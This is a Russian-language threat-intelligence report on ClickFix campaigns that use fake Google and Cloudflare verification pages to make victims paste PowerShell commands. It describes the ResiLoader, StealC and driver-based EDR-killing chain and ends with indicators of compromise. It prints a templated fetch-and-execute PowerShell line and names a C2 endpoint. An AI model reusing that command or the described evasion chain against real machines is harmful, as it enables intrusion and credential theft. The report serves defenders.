Кампании с применением атак ClickFix, которые вынуждают пользователей самостоятельно выполнять вредоносные команды, сохраняют активность с конца 2025 года. В свежих волнах атак злоумышленники используют поддельные страницы проверки от Google и Cloudflare, чтобы убедить жертву скопировать и запустить команду в PowerShell (встроенная среда автоматизации Windows). Одна ошибка - и система получает стилеры, программы удалённого доступа или дополнительное вредоносное ПО, способное полностью перехватить контроль над компьютером.
Описание
Специалисты по информационной безопасности проанализировали несколько параллельных кампаний, использующих единую инфраструктуру. В ходе анализа выяснилось, что атакующие доставляют широкий спектр вредоносных программ: HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport, а также стилер, написанный на языке Rust. Особый интерес представляет цепочка заражения, в которой троянизированная версия легитимного мессенджера Franz загружает ранее не документированный загрузчик ResiLoader. Этот загрузчик отключает антивирусные и EDR-решения (системы обнаружения и реагирования на конечных точках) и развёртывает стилер StealC, ориентированный на кражу учётных данных.
Техника ClickFix строится на социальной инженерии: пользователю показывают поддельное окно проверки (например, "Докажите, что вы не робот"), которое требует скопировать команду в PowerShell и выполнить её. Мошенники эксплуатируют доверие к брендам Google и Cloudflare, потому что эти компании действительно используют подобные механизмы верификации, но никогда не просят вставлять команды в терминал. В атаках применяются разные шаблоны: от имитации reCAPTCHA до страниц с таймерами обратного отсчёта и предупреждениями, создающими ложное чувство срочности.
Аналитики выявили несколько общих признаков инфраструктуры. В частности, многие кампании используют папку C:\ProgramData\Zooms для распаковки промежуточных стадий, одинаковые шаблоны команд PowerShell, облачные хранилища Cloudflare R2 для доставки полезной нагрузки, а также IP-адреса, принадлежащие ASN Dedik Services Limited. В некоторых ответах HTML-страницы содержат только фразу "hehe". Эти индикаторы со временем меняются, но остаются частью единой методики.
Сама финальная команда, которую жертва копирует, чаще всего выглядит как "powershell -c "iex(irm '{IP}:{Port}/{Random Path}' -UseBasicParsing)"". Порт и путь могут отсутствовать в некоторых случаях; среди использованных портов замечены 6600, 9900, 5506, 7895, 7493, 149, 8442. Для генерации таких команд применяются готовые наборы шаблонов ClickFix, распространяемые через старые, перекупленные домены, Cloudflare Pages (поддомены .pages.dev), скомпрометированные сайты и поддельные сервисы - например, "My QR Generator" или страницы доступа к файлам.
В одном из сценариев под видом исправления звука в Google Meet пользователя просили вставить команду, которая запускала PowerShell-загрузчик. Другой вариант - окно "New sign-in with trusted token", где жертве предлагали скопировать команду для верификации устройства. В некоторых наборах ClickFix присутствует так называемый "approval gate" - злоумышленник вручную выбирает из панели, какую команду отправить пользователю.
После выполнения команды на компьютер попадает скрипт PowerShell, который создаёт папку C:\ProgramData\Zooms, загружает следующий этап из облачного хранилища Cloudflare R2 или напрямую с IP-адреса, а в некоторых вариантах отправляет информацию о скомпрометированной машине на удалённый сервер. Скрипт называется tmp{4 символа}.tmp.ps1 и сохраняется во временной папке.
Среди конечных полезных нагрузок - троянизированное приложение Franz. В архиве libEGL.zip, загруженном из публичного bucket Cloudflare R2, содержится изменённая версия мессенджера. Вредоносная логика реализована в файле index.js: он считывает ключ кампании из файла readme.txt (в данном случае строка "resiloader-1", что и дало название загрузчику), проверяет наличие идентификатора в %APPDATA%\setup.txt, добивается закрепления через настройки приложения, а затем отправляет POST-запрос на сервер https://completstep.com/api/. В ответ сервер может отдать задание выполнить произвольный JavaScript-код или скачать zip-архив с DLL-файлами. В ходе конкретной атаки пришёл архив, содержащий библиотеки для DLL-hijacking (перехвата загрузки DLL) исполняемого файла ssh-add.exe.
Именно файл msys-crypto-3.dll из этого архива оказался загрузчиком ResiLoader. Он написан на .NET NativeAOT и обфусцирован. ResiLoader содержит в себе два встроенных payload: драйвер pcdhost.sys (легитимный драйвер OPSWAT AppRemover) и стилер StealC. Сначала загрузчик расшифровывает оба компонента, затем использует драйвер для завершения более чем 140 процессов, связанных с антивирусными и EDR-решениями (так называемая техника Bring Your Own Vulnerable Driver - BYOD). После этого он выполняет обход UAC (контроля учётных записей) через интерфейс ICMLuaUtil и копирует себя в папку C:\ProgramData\Google Update, добавляя запись в реестр для автозапуска. Заключительный этап - process hollowing (инъекция кода в процесс ServiceModelReg.exe), в результате которого запускается непосредственно стилер StealC.
Использование BYOD-драйвера для массового уничтожения защитных процессов делает данную атаку особенно опасной. Даже если на компьютере установлены современные средства защиты, злоумышленники могут временно вывести их из строя, не оставляя следов. Кроме того, кампании постоянно эволюционируют: появляются новые полезные нагрузки, меняются IP-адреса и пути загрузки. Например, в последних волнах атак обнаружено использование Deno - альтернативной среды выполнения JavaScript - для доставки стилера на PowerShell. Эта цепочка пока не описана подробно, но указывает на стремление атакующих диверсифицировать методы.
Для защиты от ClickFix-атак пользователям следует запомнить простое правило: ни одна легитимная служба - Google, Cloudflare, Microsoft - никогда не попросит скопировать и выполнить команду PowerShell или открыть терминал. Любые страницы с таймерами обратного отсчёта или предупреждениями о необходимости срочной верификации должны вызывать подозрение. Если инструкция требует запустить командную строку, лучше остановиться и проверить её через официальную поддержку сервиса. Дополнительную безопасность обеспечивает использование браузерных расширений, блокирующих попытки несанкционированного копирования в буфер обмена.
Индикаторы компрометации
IPv4
- 135.181.171.40
- 146.19.248.120
- 151.240.151.126
- 151.240.151.46
- 192.69.195.131
- 85.239.144.31
- 85.239.149.16
- 85.239.149.40
- 85.239.149.78
- 91.92.34.128
- 93.152.224.167
- 93.152.224.29
- 93.152.224.39
- 94.26.83.206
- 94.26.90.112
Domains
- 100furniture.com
- 123clocks.com
- antibotv3.com
- be231ro963.com
- bigflaredefence.com
- centralwildcats.com
- cloud.antibotv3.com
- cloudautosolutions.com
- completstep.com
- dropboxi.com
- eorgke09054909j.com
- eventlogerps1.ink
- generator-qrcode.online
- g-luminence.pages.dev
- khosla.capital
- nepalcharchaa.com
- onegeekworld.com
- orcanegames.com
- p-floribunds.pages.dev
- pg-altirade2.pages.dev
- pg-cordivant-m6.pages.dev
- popularcard.shop
- pub-0170eabb9df346bd822f863b7c3946e3.r2.dev
- pub-18d99d0d18b94e85824c1cc4d5b5c637.r2.dev
- pub-4ed7b8ecee744dea930d74ba4ac74285.r2.dev
- pub-620528e2dc874e16937673265aa23d39.r2.dev
- pub-9682d5896df841679c5a17eb41273f89.r2.dev
- regdev-google.com
- rwmonitoring.com
- sunseekersupply.com
- thefirmos.com
- unitedstateverif.com
- xzz.proxygrid.cc
MD5
- 0234e3188f2883a438b3f2beab7a78b2
- 206ce339febca0c3bcc850f42595fc63
- 6a9ac6b3fff7b695dbd4df6ff7f6c516
- 72907d0ca3258365838626f6a8d993a6
- b8d53740024d126cb55f83854335a4ab
- eee416efcb1e33f220cdb4b05496a07a